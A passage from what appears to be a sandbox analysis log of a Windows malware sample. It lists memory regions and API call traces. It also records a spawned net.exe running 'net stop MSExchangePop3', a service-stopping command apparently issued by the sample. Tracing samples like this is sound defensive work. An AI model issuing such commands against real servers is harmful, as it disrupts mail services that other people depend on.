"\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11238 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11239 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11240 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11241 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11242 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11243 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11244 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11245 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11246 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11247 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11248 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11249 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 687 os_tid = 0xfdc Thread: id = 688 os_tid = 0xfbc Thread: id = 689 os_tid = 0xfd8 Process: id = "231" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x14581000" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "229" os_parent_pid = "0xfc0" cmd_line = "net stop MSExchangePop3" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11263 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11264 start_va = 0x870000 end_va = 0x486ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 11265 start_va = 0x4870000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 11266 start_va = 0x4890000 end_va = 0x4891fff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 11267 start_va = 0x48a0000 end_va = 0x48b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 11268 start_va = 0x48c0000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x00000000048c0000" filename = "" Region: id = 11269 start_va = 0x4900000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 11270 start_va = 0x4980000 end_va = 0x4983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004980000" filename = "" Region: id = 11271 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004990000" filename = "" Region: id = 11272 start_va = 0x49a0000 end_va = 0x49a1fff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 11273 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11274 start_va = 0x7f5a0000 end_va = 0x7f5c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5a0000" filename = "" Region: id = 11275 start_va = 0x7f5c3000 end_va = 0x7f5c3fff entry_point = 0x0 region_type = private name = "private_0x000000007f5c3000" filename = "" Region: id = 11276 start_va = 0x7f5cc000 end_va = 0x7f5cefff entry_point = 0x0 region_type = private name = "private_0x000000007f5cc000" filename = "" Region: id = 11277 start_va = 0x7f5cf000 end_va = 0x7f5cffff entry_point = 0x0 region_type = private name = "private_0x000000007f5cf000" filename = "" Region: id = 11278 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11279 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11280 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11281 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11282 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11283 start_va = 0x49c0000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 11284 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11285 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11286 start_va = 0x4b60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 11287 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 691 os_tid = 0xff4 Thread: id = 692 os_tid = 0x604 Process: id = "232" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1414e000" os_pid = "0xf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x9cc" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangePop3" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11288 start_va = 0xe30000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 11289 start_va = 0xe50000 end_va = 0xe51fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 11290 start_va = 0xe60000 end_va = 0xe73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 11291 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 11292 start_va = 0xec0000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 11293 start_va = 0xf40000 end_va = 0xf43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 11294 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 11295 start_va = 0xf60000 end_va = 0xf61fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 11296 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11297 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11298 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11299 start_va = 0x7f2e0000 end_va = 0x7f302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2e0000" filename = "" Region: id = 11300 start_va = 0x7f307000 end_va = 0x7f307fff entry_point = 0x0 region_type = private name = "private_0x000000007f307000" filename = "" Region: id = 11301 start_va = 0x7f30b000 end_va = 0x7f30bfff entry_point = 0x0 region_type = private name = "private_0x000000007f30b000" filename = "" Region: id = 11302 start_va = 0x7f30d000 end_va = 0x7f30ffff entry_point = 0x0 region_type = private name = "private_0x000000007f30d000" filename = "" Region: id = 11303 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11304 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11305 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11306 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11307 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11308 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 11309 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11310 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11311 start_va = 0x5100000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 11312 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11313 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 11314 start_va = 0xe40000 end_va = 0xe43fff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 11315 start_va = 0xf70000 end_va = 0x102dfff entry_point = 0xf70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11316 start_va = 0x50c0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 11317 start_va = 0x5200000 end_va = 0x527ffff entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 11318 start_va = 0x5310000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 11319 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11320 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11321 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11322 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11323 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11324 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11325 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11326 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11327 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11328 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11329 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11330 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11331 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11332 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11333 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11334 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11335 start_va = 0x7f1e0000 end_va = 0x7f2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1e0000" filename = "" Region: id = 11336 start_va = 0x7f308000 end_va = 0x7f30afff entry_point = 0x0 region_type = private name = "private_0x000000007f308000" filename = "" Region: id = 11337 start_va = 0xe50000 end_va = 0xe53fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 11338 start_va = 0x1030000 end_va = 0x1032fff entry_point = 0x1030000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11339 start_va = 0x5280000 end_va = 0x52b1fff entry_point = 0x5280000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 693 os_tid = 0x168 [0138.703] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0138.703] __set_app_type (_Type=0x1) [0138.703] __p__fmode () returned 0x77ac4d6c [0138.703] __p__commode () returned 0x77ac5b1c [0138.703] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0138.704] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0138.704] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.704] GetConsoleOutputCP () returned 0x1b5 [0138.704] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0138.704] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.706] sprintf_s (in: _DstBuf=0xf3ff2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0138.706] setlocale (category=0, locale=".437") returned="English_United States.437" [0138.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0138.707] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0138.707] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangePop3" [0138.707] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xf3fcd4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0138.707] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf3fcc8 | out: Buffer=0xf3fcc8*=0x5107fe0) returned 0x0 [0138.707] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf3fccc | out: Buffer=0xf3fccc*=0x5107f68) returned 0x0 [0138.707] __iob_func () returned 0x77ac1208 [0138.707] _fileno (_File=0x77ac1208) returned 0 [0138.707] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0138.707] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0138.707] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0138.707] _wcsicmp (_String1="config", _String2="stop") returned -16 [0138.707] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0138.707] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0138.707] _wcsicmp (_String1="file", _String2="stop") returned -13 [0138.708] _wcsicmp (_String1="files", _String2="stop") returned -13 [0138.708] _wcsicmp (_String1="group", _String2="stop") returned -12 [0138.708] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0138.708] _wcsicmp (_String1="help", _String2="stop") returned -11 [0138.708] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0138.708] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0138.708] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0138.708] _wcsicmp (_String1="session", _String2="stop") returned -15 [0138.708] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0138.708] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0138.708] _wcsicmp (_String1="share", _String2="stop") returned -12 [0138.708] _wcsicmp (_String1="start", _String2="stop") returned -14 [0138.708] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0138.708] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0138.708] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0138.708] _wcsicmp (_String1="accounts", _String2="MSExchangePop3") returned -12 [0138.708] _wcsicmp (_String1="computer", _String2="MSExchangePop3") returned -10 [0138.708] _wcsicmp (_String1="config", _String2="MSExchangePop3") returned -10 [0138.708] _wcsicmp (_String1="continue", _String2="MSExchangePop3") returned -10 [0138.708] _wcsicmp (_String1="cont", _String2="MSExchangePop3") returned -10 [0138.708] _wcsicmp (_String1="file", _String2="MSExchangePop3") returned -7 [0138.708] _wcsicmp (_String1="files", _String2="MSExchangePop3") returned -7 [0138.708] _wcsicmp (_String1="group", _String2="MSExchangePop3") returned -6 [0138.708] _wcsicmp (_String1="groups", _String2="MSExchangePop3") returned -6 [0138.708] _wcsicmp (_String1="help", _String2="MSExchangePop3") returned -5 [0138.708] _wcsicmp (_String1="helpmsg", _String2="MSExchangePop3") returned -5 [0138.708] _wcsicmp (_String1="localgroup", _String2="MSExchangePop3") returned -1 [0138.708] _wcsicmp (_String1="pause", _String2="MSExchangePop3") returned 3 [0138.708] _wcsicmp (_String1="session", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="sessions", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="sess", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="share", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="start", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="stats", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="statistics", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="stop", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="time", _String2="MSExchangePop3") returned 7 [0138.708] _wcsicmp (_String1="user", _String2="MSExchangePop3") returned 8 [0138.708] _wcsicmp (_String1="users", _String2="MSExchangePop3") returned 8 [0138.708] _wcsicmp (_String1="msg", _String2="MSExchangePop3") returned 2 [0138.708] _wcsicmp (_String1="messenger", _String2="MSExchangePop3") returned -14 [0138.708] _wcsicmp (_String1="receiver", _String2="MSExchangePop3") returned 5 [0138.708] _wcsicmp (_String1="rcv", _String2="MSExchangePop3") returned 5 [0138.708] _wcsicmp (_String1="netpopup", _String2="MSExchangePop3") returned 1 [0138.708] _wcsicmp (_String1="redirector", _String2="MSExchangePop3") returned 5 [0138.708] _wcsicmp (_String1="redir", _String2="MSExchangePop3") returned 5 [0138.708] _wcsicmp (_String1="rdr", _String2="MSExchangePop3") returned 5 [0138.708] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangePop3") returned 10 [0138.708] _wcsicmp (_String1="work", _String2="MSExchangePop3") returned 10 [0138.708] _wcsicmp (_String1="wksta", _String2="MSExchangePop3") returned 10 [0138.708] _wcsicmp (_String1="prdr", _String2="MSExchangePop3") returned 3 [0138.708] _wcsicmp (_String1="devrdr", _String2="MSExchangePop3") returned -9 [0138.708] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangePop3") returned -1 [0138.708] _wcsicmp (_String1="server", _String2="MSExchangePop3") returned 6 [0138.708] _wcsicmp (_String1="svr", _String2="MSExchangePop3") returned 6 [0138.709] _wcsicmp (_String1="srv", _String2="MSExchangePop3") returned 6 [0138.709] _wcsicmp (_String1="lanmanserver", _String2="MSExchangePop3") returned -1 [0138.709] _wcsicmp (_String1="alerter", _String2="MSExchangePop3") returned -12 [0138.709] _wcsicmp (_String1="netlogon", _String2="MSExchangePop3") returned 1 [0138.709] _wcsupr (in: _String="MSExchangePop3" | out: _String="MSEXCHANGEPOP3") returned="MSEXCHANGEPOP3" [0138.709] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5102630 [0138.710] GetServiceKeyNameW (in: hSCManager=0x5102630, lpDisplayName="MSEXCHANGEPOP3", lpServiceName=0x10a8cb0, lpcchBuffer=0xf3fc44 | out: lpServiceName="", lpcchBuffer=0xf3fc44) returned 0 [0138.711] _wcsicmp (_String1="msg", _String2="MSEXCHANGEPOP3") returned 2 [0138.711] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEPOP3") returned -14 [0138.711] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEPOP3") returned 5 [0138.711] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEPOP3") returned 5 [0138.711] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEPOP3") returned 5 [0138.711] _wcsicmp (_String1="redir", _String2="MSEXCHANGEPOP3") returned 5 [0138.711] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEPOP3") returned 5 [0138.711] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEPOP3") returned 10 [0138.711] _wcsicmp (_String1="work", _String2="MSEXCHANGEPOP3") returned 10 [0138.711] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEPOP3") returned 10 [0138.711] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEPOP3") returned 3 [0138.711] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEPOP3") returned -9 [0138.711] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEPOP3") returned -1 [0138.711] _wcsicmp (_String1="server", _String2="MSEXCHANGEPOP3") returned 6 [0138.711] _wcsicmp (_String1="svr", _String2="MSEXCHANGEPOP3") returned 6 [0138.711] _wcsicmp (_String1="srv", _String2="MSEXCHANGEPOP3") returned 6 [0138.711] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEPOP3") returned -1 [0138.711] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEPOP3") returned -12 [0138.711] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEPOP3") returned 1 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="WORKSTATION") returned -10 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="LanmanWorkstation") returned 1 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="SERVER") returned -6 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="LanmanServer") returned 1 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="BROWSER") returned 11 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="BROWSER") returned 11 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="MESSENGER") returned 14 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="MESSENGER") returned 14 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="NETRUN") returned -1 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="NETRUN") returned -1 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="SPOOLER") returned -6 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="SPOOLER") returned -6 [0138.711] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="ALERTER") returned 12 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="ALERTER") returned 12 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="NETLOGON") returned -1 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", 